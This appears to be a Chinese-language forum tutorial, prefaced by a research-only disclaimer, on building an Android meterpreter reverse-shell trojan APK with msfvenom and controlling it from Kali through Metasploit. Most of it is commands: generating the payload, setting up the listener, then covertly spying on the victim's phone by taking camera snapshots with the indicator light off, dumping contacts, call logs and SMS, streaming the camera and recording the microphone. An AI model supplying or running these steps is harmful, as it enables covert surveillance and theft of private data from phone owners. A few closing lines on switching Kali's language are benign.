声明
本帖子的教程只是用于研究学习研究,请勿用于非法用途。
用到的工具:
- 一部安卓手机
- kali Linux虚拟机
生成木马:
msfvenom -p android/meterpreter/reverse_tcp lhost=kali的ip lport=自定端口 R > r自己起名字.apk
例:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.174.129 lport=5555 R > 1.apk
msfconsole //启动msfconsole
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.174.129 //这里的地址设置成我们刚才生成木马的IP地址
set lport 5555 //这里的端口设置成刚才我们生成木马所监听的端口
show options
exploit //开始执行漏洞,开始监听,等待手机上线(不要关闭)
几项常用命令:
ls,查看当前路径和文件。
sessions -l 是查看当前肉鸡触发的会话列表
sessions -i id 进入列表中的指定id
sysinfo 查看手机系统信息。
屏幕截图screenshot
闪照
webcam_snap -i 1 // 后置摄像头闪照
webcam_snap -i 2 // 前置摄像头闪照
webcam_snap -i 2 -v false // 前置摄像头闪照且没有指示灯亮起
通讯录下载
dump_contacts //导出受害者手机通讯录里的信息到 Kali 虚拟机/root路径下
通话记录下载
dump_calllog
短信下载
dump_sms
监控摄像头
webcam_stream
输入上面命令后,会输出一个随机的xxx.html
之后直接在浏览器上面访问xxx.html就可以看到实时的场景了
远程录音
record_mic -d 13
小技巧
Kali linux英文看这不舒服?
没关系我来教你Kali linux 中英文切换
- 英文切换中文:
第一步:echo LANG="zh_CN.UTF-8" > /etc/default/locale 第二步:reboot //重启虚拟机
- 中文切换英文
第一步:echo LANG="en_US.UTF-8" > /etc/default/locale 第二步:reboot //重启虚拟机
你们喜欢Kali的中文还是英文
中文
英文